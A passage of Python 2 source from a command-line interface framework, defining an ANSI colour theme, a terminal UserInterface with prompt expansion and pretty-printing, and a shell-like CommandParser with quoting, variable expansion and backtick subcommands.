prompts.\"\"\"\n\tdef _setcolors(cls):\n\t\t# ANSI escapes for color terminals\n\t\tcls.NORMAL = cls.RESET = \"\\x1b[0m\"\n\t\tcls.BOLD = cls.BRIGHT = \"\\x1b[01m\"\n\t\tcls.BLACK = \"\\x1b[30m\"\n\t\tcls.RED = \"\\x1b[31m\"\n\t\tcls.GREEN = \"\\x1b[32m\"\n\t\tcls.YELLOW = \"\\x1b[33m\"\n\t\tcls.BLUE = \"\\x1b[34m\"\n\t\tcls.MAGENTA = \"\\x1b[35m\"\n\t\tcls.CYAN = \"\\x1b[36m\"\n\t\tcls.WHITE = \"\\x1b[37m\"\n\t\tcls.GREY = \"\\x1b[30;01m\"\n\t\tcls.BRIGHTRED = \"\\x1b[31;01m\"\n\t\tcls.BRIGHTGREEN = \"\\x1b[32;01m\"\n\t\tcls.BRIGHTYELLOW = \"\\x1b[33;01m\"\n\t\tcls.BRIGHTBLUE = \"\\x1b[34;01m\"\n\t\tcls.BRIGHTMAGENTA = \"\\x1b[35;01m\"\n\t\tcls.BRIGHTCYAN = \"\\x1b[36;01m\"\n\t\tcls.BRIGHTWHITE = \"\\x1b[37;01m\"\n\t\tcls.DEFAULT = \"\\x1b[39;49m\"\n\t\tcls.UNDERSCORE = \"\\x1b[4m\"\n\t\tcls.BLINK = \"\\x1b[5m\"\n\t\tcls.help_local = cls.BRIGHTWHITE\n\t\tcls.help_inherited = cls.YELLOW\n\t\tcls.help_created = cls.GREEN\n\t_setcolors = classmethod(_setcolors)\n\nDefaultTheme = ANSITheme\n\n
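# A hypothetical customization (these exact prompt strings are not part of\n# the original module): themes accept alternate prompts at construction, e.g.\n#   ui = UserInterface(ConsoleIO(), theme=ANSITheme(ps1=\"%Yapp%N> \"))\nclass UserInterface(object):\n\t\"\"\"An ANSI terminal user interface for CLIs. 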
\"\"\"\n\tdef __init__(self, io, env=None, theme=None):\n\t\tself._io = io\n\t\tself._env = env or environ.Environ()\n\t\tassert hasattr(self._env, \"get\")\n\t\tself._env[\"_\"] = None\n\t\tself._cache = {}\n\t\tif io.isatty():\n\t\t\tself._termlen, self._termwidth, x, y = termtools.get_winsize(io.fileno())\n\t\telse:\n\t\t\tself._termlen, self._termwidth = 24, 80\n\t\tself.set_theme(theme)\n\t\tself._initfsm()\n\t\tself.initialize()\n\n\twinsize = property(lambda s: (s._termwidth, s._termlen), None, None, \"Terminal size, if available\")\n\n\tdef __del__(self):\n\t\ttry:\n\t\t\tself.finalize()\n\t\texcept:\n\t\t\tpass\n\n\tdef initialize(self, *args):\n\t\tpass\n\n\tdef finalize(self):\n\t\tpass\n\t\n\tdef close(self):\n\t\tif self._io is not None:\n\t\t\tself._io.close()\n\t\t\tself._io = None\n\n\tdef set_environ(self, env):\n\t\tassert hasattr(env, \"get\")\n\t\tself._env = env\n\t\tself._env[\"_\"] = None\n\n\tdef set_theme(self, theme):\n\t\tself._theme = theme or DefaultTheme()\n\t\tassert isinstance(self._theme, Theme), \"must supply a Theme object.\"\n\t\tself._env.setdefault(\"PS1\", self._theme.ps1)\n\t\tself._env.setdefault(\"PS2\", self._theme.ps2)\n\t\tself._env.setdefault(\"PS3\", self._theme.ps3)\n\t\tself._env.setdefault(\"PS4\", self._theme.ps4)\n\n\tdef clone(self, theme=None):\n\t\treturn self.__class__(self._io, self._env.copy(), theme or self._theme) \n\t\n\t# output methods\n\tdef Print(self, *objs):\n\t\twr = self._io.write\n\t\tif objs:\n\t\t\ttry:\n\t\t\t\tfor obj in objs[:-1]:\n\t\t\t\t\twr(str(obj))\n\t\t\t\t\twr(\" \")\n\t\t\t\tlast = objs[-1]\n\t\t\t\tif last is not None: # don't NL if last value is None (works like trailing comma).\n\t\t\t\t\twr(str(last))\n\t\t\t\t\twr(\"\\n\")\n\t\t\texcept PageQuitError:\n\t\t\t\treturn\n\t\telse:\n\t\t\twr(\"\\n\")\n\t\tself._io.flush()\n\n\tdef pprint(self, obj):\n\t\tself._format(obj, 0, 0, {}, 0)\n\t\tself._io.write(\"\\n\")\n\t\tself._io.flush()\n\t\n\tdef printf(self, text):\n\t\t\"Print text run through the prompt formatter.\"\n\t\tself.Print(self.format(text))\n\t\n\tdef print_obj(self, obj, nl=1):\n\t\tif nl:\n\t\t\tself._io.write(\"%s\\n\" % (obj,))\n\t\telse:\n\t\t\tself._io.write(str(obj))\n\t\tself._io.flush()\n\n\tdef print_list(self, clist, indent=0):\n\t\tif clist:\n\t\t\twidth = self._termwidth - 9\n\t\t\tindent = min(max(indent,0),width)\n\t\t\tps = \" \" * indent\n\t\t\ttry:\n\t\t\t\tfor c in clist[:-1]:\n\t\t\t\t\tcs = \"%s, \" % (c,)\n\t\t\t\t\tif len(ps) + len(cs) > width:\n\t\t\t\t\t\tself.print_obj(ps)\n\t\t\t\t\t\tps = \"%s%s\" % (\" \" * indent, cs)\n\t\t\t\t\telse:\n\t\t\t\t\t\tps += cs\n\t\t\t\tself.print_obj(\"%s%s\" % (ps, clist[-1]))\n\t\t\texcept PageQuitError:\n\t\t\t\tpass\n\n\tdef error(self, text):\n\t\tself.printf(\"%%R%s%%N\" % (text,))\n\n\t# report-like methods for test framework\n\tdef write(self, text):\n\t\tself._io.write(text)\n\tdef writeline(self, text=\"\"):\n\t\tself._io.writeline(text)\n\tdef writelines(self, lines):\n\t\tself._io.writelines(lines)\n\n\tdef add_heading(self, text, level=1):\n\t\ts = [\"\\n\"]\n\t\ts.append(\"%s%s\" % (\" \"*(level-1), text))\n\t\ts.append(\"%s%s\" % (\" \"*(level-1), \"-\"*len(text)))\n\t\tself.Print(\"\\n\".join(s))\n\n\tdef add_title(self, title):\n\t\tself.add_heading(title, 0)\n\n\t# called with the name of a logfile to report\n\tdef logfile(self, filename):\n\t\tself._io.write(\"LOGFILE: <%s>\\n\" % (filename,))\n\n\tdef add_message(self, msgtype, msg, level=1):\n\t\tself._io.write(\"%s%s: %s\\n\" % (\" \"*(level-1), msgtype, 
msg))\n\n\tdef add_summary(self, text):\n\t\tself._io.write(text)\n\n\tdef add_text(self, text):\n\t\tself._io.write(text)\n\n\tdef add_url(self, text, url):\n\t\tself._io.write(\"%s: <%s>\\n\" % (text, url))\n\n\tdef passed(self, msg=\"\", level=1):\n\t\treturn self.add_message(self.format(\"%GPASSED%N\"), msg, level)\n\n\tdef failed(self, msg=\"\", level=1):\n\t\treturn self.add_message(self.format(\"%RFAILED%N\"), msg, level)\n\n\t# XXX: new message type introduced for multiple UUTs\n\tdef completed(self, msg=\"\", level=1):\n\t\treturn self.add_message(self.format(\"%GCOMPLETED%N\"), msg, level)\n\n\tdef incomplete(self, msg=\"\", level=1):\n\t\treturn self.add_message(self.format(\"%yINCOMPLETE%N\"), msg, level)\n\n\tdef abort(self, msg=\"\", level=1):\n\t\treturn self.add_message(self.format(\"%YABORT%N\"), msg, level)\n\n\tdef info(self, msg, level=1):\n\t\tmsg_type = \"INFO [%s]\" % time.strftime('%H:%M:%S')\n\t\treturn self.add_message(msg_type, msg, level)\n\n\tdef diagnostic(self, msg, level=1):\n\t\treturn self.add_message(self.format(\"%yDIAGNOSTIC%N\"), msg, level)\n\n\tdef debug(self, msg, level=1):\n\t\treturn self.add_message(self.format(\"%yDEBUG%N\"), msg, level)\n\n\tdef newpage(self):\n\t\tself._io.write(\"\\x0c\") # FF\n\n\tdef newsection(self):\n\t\tself._io.write(\"\\x0c\") # FF\n\n\t# user input\n\tdef _get_prompt(self, name, prompt=None):\n\t\treturn PROMPT_START_IGNORE+self.format(prompt or self._env[name])+PROMPT_END_IGNORE\n\n\tdef user_input(self, prompt=None):\n\t\treturn self._io.raw_input(self._get_prompt(\"PS1\", prompt))\n\n\tdef more_user_input(self):\n\t\treturn self._io.raw_input(self._get_prompt(\"PS2\"))\n\n\tdef choose(self, somelist, defidx=0, prompt=None):\n\t\treturn cliutils.choose(somelist, defidx, self._get_prompt(\"PS3\", prompt), input=self._io.raw_input)\n\t\n\tdef get_text(self, msg=None):\n\t\treturn cliutils.get_text(self._get_prompt(\"PS4\"), msg, input=self._io.raw_input)\n\n\tdef get_value(self, prompt, default=None):\n\t\treturn cliutils.get_input(self.format(prompt), default, self._io.raw_input)\n\n\tdef yes_no(self, prompt, default=True):\n\t\tyesno = cliutils.get_input(self.format(prompt), IF(default, \"Y\", \"N\"), self._io.raw_input)\n\t\treturn yesno.upper().startswith(\"Y\")\n\n\tdef get_key(self, prompt=None, timeout=None, default=\"\"):\n\t\tio = self._io\n\t\tif prompt:\n\t\t\tclear = \"\\b\"*len(prompt)+\" \"*len(prompt)+\"\\b\"*len(prompt)\n\t\t\tio.write(prompt)\n\t\t\tio.flush()\n\t\tif timeout is not None:\n\t\t\ttry:\n\t\t\t\tc = timer.iotimeout(get_key, (io.fileno(),), timeout=timeout)\n\t\t\texcept TimeoutError:\n\t\t\t\tc = default\n\t\telse:\n\t\t\tc = termtools.get_key(io.fileno())\n\t\tif prompt:\n\t\t\tio.write(clear) ; io.flush()\n\t\treturn c\n\t\n\tdef display(self, line):\n\t\t\"\"\"display a line of text, overwriting the old line.\"\"\"\n\t\tself._io.write(\"\\r\"+str(line).strip())\n\n\t# docstring/help formatters\n\tdef _format_doc(self, s, color):\n\t\ti = s.find(\"\\n\")\n\t\tif i > 0:\n\t\t\treturn color+s[:i]+self._theme.NORMAL+s[i:]+\"\\n\"\n\t\telse:\n\t\t\treturn color+s+self._theme.NORMAL+\"\\n\"\n\n\tdef help_local(self, text):\n\t\tself.Print(self._format_doc(text, self._theme.help_local))\n\n\tdef help_inherited(self, text):\n\t\tself.Print(self._format_doc(text, self._theme.help_inherited))\n\t\n\tdef help_created(self, text):\n\t\tself.Print(self._format_doc(text, self._theme.help_created))\n\n
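\t# Illustrative expansions (examples added here, not from the original\n\t# source; the mapping itself is defined below in _initfsm):\n\t#   ui.format(\"%Yhello%N\") -> \"hello\" in bright yellow, then reset\n\t#   ui.format(\"%T %t\")     -> current date and time\n\t#   ui.format(\"%{PS1}\")    -> value of the PS1 environment variable\n\tdef format(self, ps):\n\t\t\"Expand percent-expansions in a string and return the 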
result.\"\n\t\tself._fsm.process_string(ps)\n\t\treturn self._getarg()\n\n\tdef register_expansion(self, key, func):\n\t\t\"\"\"Register a percent-expansion function for the format method. The\n\t\tfunction must take one argument, and return a string. The argument is\n\t\tthe character expanded on.\"\"\"\n\t\tkey = str(key)[0]\n\t\tif not self._EXPANSIONS.has_key(key):\n\t\t\tself._EXPANSIONS[key] = func\n\t\telse:\n\t\t\traise ValueError, \"expansion key %r already exists.\" % (key, )\n\t\n\t# FSM for prompt expansion\n\tdef _initfsm(self):\n\t\t# maps percent-expansion items to some value.\n\t\tself._EXPANSIONS = {\n\t\t\t\t\t\"I\":self._theme.BRIGHT, \n\t\t\t\t\t\"N\":self._theme.NORMAL, \n\t\t\t\t\t\"D\":self._theme.DEFAULT,\n\t\t\t\t\t\"R\":self._theme.BRIGHTRED, \n\t\t\t\t\t\"G\":self._theme.BRIGHTGREEN, \n\t\t\t\t\t\"Y\":self._theme.BRIGHTYELLOW,\n\t\t\t\t\t\"B\":self._theme.BRIGHTBLUE, \n\t\t\t\t\t\"M\":self._theme.BRIGHTMAGENTA, \n\t\t\t\t\t\"C\":self._theme.BRIGHTCYAN, \n\t\t\t\t\t\"W\":self._theme.BRIGHTWHITE, \n\t\t\t\t\t\"r\":self._theme.RED, \n\t\t\t\t\t\"g\":self._theme.GREEN, \n\t\t\t\t\t\"y\":self._theme.YELLOW,\n\t\t\t\t\t\"b\":self._theme.BLUE, \n\t\t\t\t\t\"m\":self._theme.MAGENTA, \n\t\t\t\t\t\"c\":self._theme.CYAN, \n\t\t\t\t\t\"w\":self._theme.WHITE, \n\t\t\t\t\t\"n\":\"\\n\", \"l\":self._tty, \"h\":self._hostname, \"u\":self._username, \n\t\t\t\t\t\"$\": self._priv, \"d\":self._cwd, \"L\": self._shlvl, \"t\":self._time, \n\t\t\t\t\t\"T\":self._date}\n\t\tf = FSM(0)\n\t\tf.add_default_transition(self._error, 0)\n\t\t# add text to args\n\t\tf.add_transition(ANY, 0, self._addtext, 0)\n\t\t# percent escapes\n\t\tf.add_transition(\"%\", 0, None, 1)\n\t\tf.add_transition(\"%\", 1, self._addtext, 0)\n\t\tf.add_transition(\"{\", 1, self._startvar, 2)\n\t\tf.add_transition(\"}\", 2, self._endvar, 0)\n\t\tf.add_transition(ANY, 2, self._vartext, 2)\n\t\tf.add_transition(ANY, 1, self._expand, 0)\n\t\tf.arg = ''\n\t\tself._fsm = f\n\t\n\tdef _startvar(self, c, fsm):\n\t\tfsm.varname = \"\"\n\n\tdef _vartext(self, c, fsm):\n\t\tfsm.varname += c\n\n\tdef _endvar(self, c, fsm):\n\t\tfsm.arg += str(self._env.get(fsm.varname, fsm.varname))\n\n\tdef _expand(self, c, fsm):\n\t\ttry:\n\t\t\targ = self._cache[c]\n\t\texcept KeyError:\n\t\t\ttry:\n\t\t\t\targ = self._EXPANSIONS[c]\n\t\t\texcept KeyError:\n\t\t\t\targ = c\n\t\t\telse:\n\t\t\t\tif callable(arg):\n\t\t\t\t\targ = str(arg(c))\n\t\tfsm.arg += arg\n\n\tdef _username(self, c):\n\t\tun = os.environ.get(\"USERNAME\") or os.environ.get(\"USER\")\n\t\tif un:\n\t\t\tself._cache[c] = un\n\t\treturn un\n\t\n\tdef _shlvl(self, c):\n\t\treturn str(self._env.get(\"SHLVL\", \"\"))\n\t\n\tdef _hostname(self, c):\n\t\thn = os.uname()[1]\n\t\tself._cache[c] = hn\n\t\treturn hn\n\t\n\tdef _priv(self, c):\n\t\tif os.getuid() == 0:\n\t\t\targ = \"#\"\n\t\telse:\n\t\t\targ = \">\"\n\t\tself._cache[c] = arg\n\t\treturn arg\n\t\n\tdef _tty(self, c):\n\t\tn = os.ttyname(self._io.fileno())\n\t\tself._cache[c] = n\n\t\treturn n\n\t\n\tdef _cwd(self, c):\n\t\treturn os.getcwd()\n\t\n\tdef _time(self, c):\n\t\treturn time.strftime(\"%H:%M:%S\", time.localtime())\n\t\n\tdef _date(self, c):\n\t\treturn time.strftime(\"%m/%d/%Y\", time.localtime())\n\n\tdef _error(self, input_symbol, fsm):\n\t\tself._io.errlog('Prompt string error: %s\\n%r' % (input_symbol, fsm.stack))\n\t\tfsm.reset()\n\n\tdef _addtext(self, c, fsm):\n\t\tfsm.arg += c\n\n\tdef _getarg(self):\n\t\tif self._fsm.arg:\n\t\t\targ = self._fsm.arg\n\t\t\tself._fsm.arg = ''\n\t\t\treturn 
arg\n\t\telse:\n\t\t\treturn None\n\t\n\t# pretty printing\n\tdef _format(self, obj, indent, allowance, context, level):\n\t\tlevel = level + 1\n\t\tobjid = id(obj)\n\t\tif objid in context:\n\t\t\tself._io.write(_recursion(obj))\n\t\t\treturn\n\t\trep = self._repr(obj, context, level - 1)\n\t\ttyp = type(obj)\n\t\tsepLines = len(rep) > (self._termwidth - 1 - indent - allowance)\n\t\twrite = self._io.write\n\n\t\tif sepLines:\n\t\t\tif typ is dict:\n\t\t\t\twrite('{\\n ')\n\t\t\t\tlength = len(obj)\n\t\t\t\tif length:\n\t\t\t\t\tcontext[objid] = 1\n\t\t\t\t\tindent = indent + 2\n\t\t\t\t\titems = obj.items()\n\t\t\t\t\titems.sort()\n\t\t\t\t\tkey, ent = items[0]\n\t\t\t\t\trep = self._repr(key, context, level)\n\t\t\t\t\twrite(rep)\n\t\t\t\t\twrite(': ')\n\t\t\t\t\tself._format(ent, indent + len(rep) + 2, allowance + 1, context, level)\n\t\t\t\t\tif length > 1:\n\t\t\t\t\t\tfor key, ent in items[1:]:\n\t\t\t\t\t\t\trep = self._repr(key, context, level)\n\t\t\t\t\t\t\twrite(',\\n%s%s: ' % (' '*indent, rep))\n\t\t\t\t\t\t\tself._format(ent, indent + len(rep) + 2, allowance + 1, context, level)\n\t\t\t\t\tindent = indent - 2\n\t\t\t\t\tdel context[objid]\n\t\t\t\twrite('\\n}')\n\t\t\t\treturn\n\n\t\t\tif typ is list:\n\t\t\t\twrite('[\\n')\n\t\t\t\tself.print_list(obj, 2)\n\t\t\t\twrite(']')\n\t\t\t\treturn\n\n\t\t\tif typ is tuple:\n\t\t\t\twrite('(\\n')\n\t\t\t\tself.print_list(obj, 2)\n\t\t\t\tif len(obj) == 1:\n\t\t\t\t\twrite(',')\n\t\t\t\twrite(')')\n\t\t\t\treturn\n\n\t\twrite(rep)\n\n\tdef _repr(self, obj, context, level):\n\t\treturn self._safe_repr(obj, context.copy(), None, level)\n\n\tdef _safe_repr(self, obj, context, maxlevels, level):\n\t\treturn _safe_repr(obj, context, maxlevels, level)\n\n# Return repr_string\ndef _safe_repr(obj, context, maxlevels, level):\n\ttyp = type(obj)\n\tif typ is str:\n\t\tif 'locale' not in sys.modules:\n\t\t\treturn repr(obj)\n\t\tif \"'\" in obj and '\"' not in obj:\n\t\t\tclosure = '\"'\n\t\t\tquotes = {'\"': '\\\\\"'}\n\t\telse:\n\t\t\tclosure = \"'\"\n\t\t\tquotes = {\"'\": \"\\\\'\"}\n\t\tqget = quotes.get\n\t\tsio = StringIO()\n\t\twrite = sio.write\n\t\tfor char in obj:\n\t\t\tif char.isalpha():\n\t\t\t\twrite(char)\n\t\t\telse:\n\t\t\t\twrite(qget(char, `char`[1:-1]))\n\t\treturn (\"%s%s%s\" % (closure, sio.getvalue(), closure))\n\n\tif typ is dict:\n\t\tif not obj:\n\t\t\treturn \"{}\"\n\t\tobjid = id(obj)\n\t\tif maxlevels and level > maxlevels:\n\t\t\treturn \"{...}\"\n\t\tif objid in context:\n\t\t\treturn _recursion(obj)\n\t\tcontext[objid] = 1\n\t\tcomponents = []\n\t\tappend = components.append\n\t\tlevel += 1\n\t\tsaferepr = _safe_repr\n\t\tfor k, v in obj.iteritems():\n\t\t\tkrepr = saferepr(k, context, maxlevels, level)\n\t\t\tvrepr = saferepr(v, context, maxlevels, level)\n\t\t\tappend(\"%s: %s\" % (krepr, vrepr))\n\t\tdel context[objid]\n\t\treturn \"{%s}\" % \", \".join(components)\n\n\tif typ is list or typ is tuple:\n\t\tif typ is list:\n\t\t\tif not obj:\n\t\t\t\treturn \"[]\"\n\t\t\tformat = \"[%s]\"\n\t\telif len(obj) == 1:\n\t\t\tformat = \"(%s,)\"\n\t\telse:\n\t\t\tif not obj:\n\t\t\t\treturn \"()\"\n\t\t\tformat = \"(%s)\"\n\t\tobjid = id(obj)\n\t\tif maxlevels and level > maxlevels:\n\t\t\treturn format % \"...\"\n\t\tif objid in context:\n\t\t\treturn _recursion(obj)\n\t\tcontext[objid] = 1\n\t\tcomponents = []\n\t\tappend = components.append\n\t\tlevel += 1\n\t\tfor o in obj:\n\t\t\torepr = _safe_repr(o, context, maxlevels, level)\n\t\t\tappend(orepr)\n\t\tdel context[objid]\n\t\treturn format % \", 
\".join(components)\n\n\tif typ is MethodType:\n\t\treturn method_repr(obj)\n\n\trep = repr(obj)\n\treturn rep\n\ndef _recursion(obj):\n\treturn (\"<Recursion on %s with id=%s>\" % (type(obj).__name__, id(obj)))\n\ndef safe_repr(value):\n\treturn _safe_repr(value, {}, None, 0)\n\ndef method_repr(method):\n\tmethname = method.im_func.func_name\n\t# formal names\n\tvarnames = list(method.im_func.func_code.co_varnames)[1:method.im_func.func_code.co_argcount]\n\tif method.im_func.func_defaults:\n\t\tld = len(method.im_func.func_defaults)\n\t\tvarlist = [\", \".join(varnames[:-ld]), \n\t\t\t\t \", \".join([\"%s=%r\" % (n, v) for n, v in zip(varnames[-ld:], method.im_func.func_defaults)])]\n\t\treturn \"%s(%s)\" % (methname, \", \".join(varlist))\n\telse:\n\t\treturn \"%s(%s)\" % (methname, \", \".join(varnames))\n\ndef _reset_readline():\n\tif readline:\n\t\treadline.parse_and_bind(\"tab: complete\")\n\t\treadline.parse_and_bind(\"?: possible-completions\")\n\t\treadline.parse_and_bind(\"set horizontal-scroll-mode on\")\n\t\treadline.parse_and_bind(\"set page-completions on\")\n\t\treadline.set_history_length(500)\n\ndef get_history_file(obj):\n\t\"Utility to form a useful history file name from an object instance.\"\n\treturn os.path.join(os.environ[\"HOME\"], \".hist_%s\" % (obj.__class__.__name__,))\n\nclass CommandParser(object):\n\t\"\"\"Reads an IO stream and parses input similar to Bourne shell syntax.\n\tCalls command methods for each line. Handles readline completer.\"\"\"\n\tVARCHARS = r'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_?'\n\t_SPECIAL = {\"r\":\"\\r\", \"n\":\"\\n\", \"t\":\"\\t\", \"b\":\"\\b\"}\n\tdef __init__(self, cmdobj=None, logfile=None, historyfile=None):\n\t\tself.reset(cmdobj)\n\t\tself._logfile = logfile\n\t\tif historyfile:\n\t\t\tself._historyfile = os.path.expanduser(os.path.expandvars(str(historyfile)))\n\t\telse:\n\t\t\tself._historyfile = None\n\t\tself._init()\n\t\tif readline:\n\t\t\tif self._historyfile:\n\t\t\t\ttry:\n\t\t\t\t\treadline.read_history_file(self._historyfile)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\tdef _rl_completer(self, text, state):\n\t\tif state == 0:\n\t\t\tcurr = readline.get_line_buffer()\n\t\t\tb = readline.get_begidx()\n\t\t\tif b == 0:\n\t\t\t\tcomplist = self._cmd.get_completion_scope(\"commands\")\n\t\t\telse: # complete based on scope keyed on previous word\n\t\t\t\tword = curr[:b].split()[-1]\n\t\t\t\tcomplist = self._cmd.get_completion_scope(word)\n\t\t\tself._complist = filter(lambda s: s.startswith(text), complist)\n\t\ttry:\n\t\t\treturn self._complist[state]\n\t\texcept IndexError:\n\t\t\treturn None\n\n\tdef close(self):\n\t\tself.reset()\n\n\tdef __del__(self):\n\t\tif readline:\n\t\t\tif self._historyfile:\n\t\t\t\ttry:\n\t\t\t\t\treadline.write_history_file(self._historyfile)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\tdef reset(self, newcmd=None):\n\t\tself._cmds = []\n\t\tself._cmd = None\n\t\tself.arg_list = []\n\t\tself._buf = \"\"\n\t\tif newcmd:\n\t\t\tself.push_command(newcmd)\n\t\n\tcommands = property(lambda s: s._cmd, None, None)\n\n\tdef push_command(self, newcmd):\n\t\tlvl = int(newcmd._environ.setdefault(\"SHLVL\", 0))\n\t\tnewcmd._environ[\"SHLVL\"] = lvl+1\n\t\tself._cmds.append(newcmd)\n\t\tself._cmd = newcmd # current command holder\n\t\tcmdlist = newcmd.get_commands()\n\t\tnewcmd.add_completion_scope(\"commands\", cmdlist )\n\t\tnewcmd.add_completion_scope(\"help\", cmdlist )\n\n\tdef pop_command(self, returnval=None):\n\t\tcmd = self._cmds.pop()\n\t\tcmd.finalize()\n\t\tif 
self._cmds:\n\t\t\tself._cmd = self._cmds[-1]\n\t\t\tif returnval:\n\t\t\t\tself._cmd.handle_subcommand(returnval)\n\t\telse:\n\t\t\traise CommandQuit, \"last command object quit.\"\n\n\tdef command_setup(self, obj, prompt=None):\n\t\tif self._cmd:\n\t\t\tself._cmd._setup(obj, prompt)\n\n\tdef parse(self, url):\n\t\timport urllib\n\t\tfo = urllib.urlopen(url)\n\t\tself.parseFile(fo)\n\t\tfo.close()\n\n\tdef parseFile(self, fo):\n\t\tdata = fo.read(4096)\n\t\twhile data:\n\t\t\tself.feed(data)\n\t\t\tdata = fo.read(4096)\n\n\tdef interact(self, cmd=None):\n\t\t_reset_readline()\n\t\tif cmd and isinstance(cmd, BaseCommands):\n\t\t\tself.push_command(cmd)\n\t\tif readline:\n\t\t\toc = readline.get_completer()\n\t\t\treadline.set_completer(self._rl_completer)\n\t\ttry:\n\t\t\ttry:\n\t\t\t\twhile 1:\n\t\t\t\t\tui = self._cmd._ui\n\t\t\t\t\ttry:\n\t\t\t\t\t\tline = ui.user_input()\n\t\t\t\t\t\tif not line:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\twhile self.feed(line+\"\\n\"):\n\t\t\t\t\t\t\tline = ui.more_user_input()\n\t\t\t\t\texcept EOFError:\n\t\t\t\t\t\tself._cmd._print()\n\t\t\t\t\t\tself.pop_command()\n\t\t\texcept (CommandQuit, CommandExit): # last command does this\n\t\t\t\tpass\n\t\tfinally:\n\t\t\tif readline:\n\t\t\t\treadline.set_completer(oc)\n\t\t\t\tif self._historyfile:\n\t\t\t\t\ttry:\n\t\t\t\t\t\treadline.write_history_file(self._historyfile)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\n\tdef feed(self, text):\n\t\tif self._logfile:\n\t\t\tself._logfile.write(text)\n\t\ttext = self._buf + text\n\t\ti = 0 \n\t\tfor c in text:\n\t\t\ti += 1\n\t\t\ttry:\n\t\t\t\tself._fsm.process(c)\n\t\t\t\twhile self._fsm.stack:\n\t\t\t\t\tself._fsm.process(self._fsm.pop())\n\t\t\texcept EOFError:\n\t\t\t\tself.pop_command()\n\t\t\texcept CommandQuit:\n\t\t\t\tval = sys.exc_info()[1]\n\t\t\t\tself.pop_command(val.value)\n\t\t\texcept NewCommand, cmdex:\n\t\t\t\tself.push_command(cmdex.value)\n\t\tif self._fsm.current_state: # non-zero, stuff left\n\t\t\tself._buf = text[i:]\n\t\treturn self._fsm.current_state\n\n\tdef _init(self):\n\t\tf = FSM(0)\n\t\tf.arg = \"\"\n\t\tf.add_default_transition(self._error, 0)\n\t\t# normally add text to args\n\t\tf.add_transition(ANY, 0, self._addtext, 0)\n\t\tf.add_transition_list(\" \\t\", 0, self._wordbreak, 0)\n\t\tf.add_transition_list(\";\\n\", 0, self._doit, 0)\n\t\t# slashes\n\t\tf.add_transition(\"\\\\\", 0, None, 1)\n\t\tf.add_transition(\"\\\\\", 3, None, 6)\n\t\tf.add_transition(ANY, 1, self._slashescape, 0)\n\t\tf.add_transition(ANY, 6, self._slashescape, 3)\n\t\t# vars \n\t\tf.add_transition(\"$\", 0, self._startvar, 7)\n\t\tf.add_transition(\"{\", 7, self._vartext, 9)\n\t\tf.add_transition_list(self.VARCHARS, 7, self._vartext, 7)\n\t\tf.add_transition(ANY, 7, self._endvar, 0)\n\t\tf.add_transition(\"}\", 9, self._endvar, 0)\n\t\tf.add_transition(ANY, 9, self._vartext, 9)\n\t\t# vars in singlequote\n\t\tf.add_transition(\"$\", 3, self._startvar, 8)\n\t\tf.add_transition(\"{\", 8, self._vartext, 10)\n\t\tf.add_transition_list(self.VARCHARS, 8, self._vartext, 8)\n\t\tf.add_transition(ANY, 8, self._endvar, 3)\n\t\tf.add_transition(\"}\", 10, self._endvar, 3)\n\t\tf.add_transition(ANY, 10, self._vartext, 10)\n\n\t\t# single quotes quote all\n\t\tf.add_transition(\"'\", 0, None, 2)\n\t\tf.add_transition(\"'\", 2, self._singlequote, 0)\n\t\tf.add_transition(ANY, 2, self._addtext, 2)\n\t\t# double quotes allow embedding word breaks and such\n\t\tf.add_transition('\"', 0, None, 3)\n\t\tf.add_transition('\"', 3, self._doublequote, 0)\n\t\tf.add_transition(ANY, 3, 
self._addtext, 3)\n\t\t# single-quotes within double quotes\n\t\tf.add_transition(\"'\", 3, None, 5)\n\t\tf.add_transition(\"'\", 5, self._singlequote, 3)\n\t\tf.add_transition(ANY, 5, self._addtext, 5)\n\t\t# back-tick substitution\n\t\tf.add_transition(\"`\", 0, None, 12)\n\t\tf.add_transition(ANY, 12, self._addtext, 12)\n\t\tf.add_transition(\"`\", 12, self._do_backtick, 0)\n\t\tself._fsm = f\n\n\tdef _startvar(self, c, fsm):\n\t\tfsm.varname = c\n\n\tdef _vartext(self, c, fsm):\n\t\tfsm.varname += c\n\n\tdef _endvar(self, c, fsm):\n\t\tif c == \"}\":\n\t\t\tfsm.varname += c\n\t\telse:\n\t\t\tfsm.push(c)\n\t\ttry:\n\t\t\tfsm.arg += self._cmd._environ.expand(fsm.varname)\n\t\texcept:\n\t\t\tex, val, tb = sys.exc_info()\n\t\t\tself._cmd._ui.error(\"Could not expand variable %r: %s (%s)\" % (fsm.varname, ex, val))\n\n\tdef _error(self, input_symbol, fsm):\n\t\tself._cmd._ui.error('Syntax error: %s\\n%r' % (input_symbol, fsm.stack))\n\t\tfsm.reset()\n\n\tdef _addtext(self, c, fsm):\n\t\tfsm.arg += c\n\n\tdef _wordbreak(self, c, fsm):\n\t\tif fsm.arg:\n\t\t\tself.arg_list.append(fsm.arg)\n\t\t\tfsm.arg = ''\n\n\tdef _slashescape(self, c, fsm):\n\t\tfsm.arg += CommandParser._SPECIAL.get(c, c)\n\n\tdef _singlequote(self, c, fsm):\n\t\tself.arg_list.append(fsm.arg)\n\t\tfsm.arg = ''\n\n\tdef _doublequote(self, c, fsm):\n\t\tself.arg_list.append(fsm.arg)\n\t\tfsm.arg = ''\n\n\tdef _doit(self, c, fsm):\n\t\tif fsm.arg:\n\t\t\tself.arg_list.append(fsm.arg)\n\t\t\tfsm.arg = ''\n\t\targs = self.arg_list\n\t\tself.arg_list = []\n\t\tself._cmd(args) # call command object with argv\n\n\tdef _do_backtick(self, c, fsm):\n\t\tif fsm.arg:\n\t\t\tself.arg_list.append(fsm.arg)\n\t\t\tfsm.arg = ''\n\t\tio = StringIO()\n\t\tsys.stdout.flush()\n\t\tsys.stdout = sys.stdin = io\n\t\ttry:\n\t\t\tsubcmd = self._cmd.subshell(io)\n\t\t\tsubparser = CommandParser(subcmd, self._logfile)\n\t\t\ttry:\n\t\t\t\tsubparser.feed(self.arg_list.pop()+\"\\n\")\n\t\t\texcept:\n\t\t\t\tex, val, tb = sys.exc_info()\n\t\t\t\tprint >>sys.stderr, \" *** %s (%s)\" % (ex, val)\n\t\tfinally:\n\t\t\tsys.stdout = sys.__stdout__\n\t\t\tsys.stdin = sys.__stdin__\n\t\tfsm.arg += io.getvalue().strip()\n\n# get a cli built from sys.argv\ndef 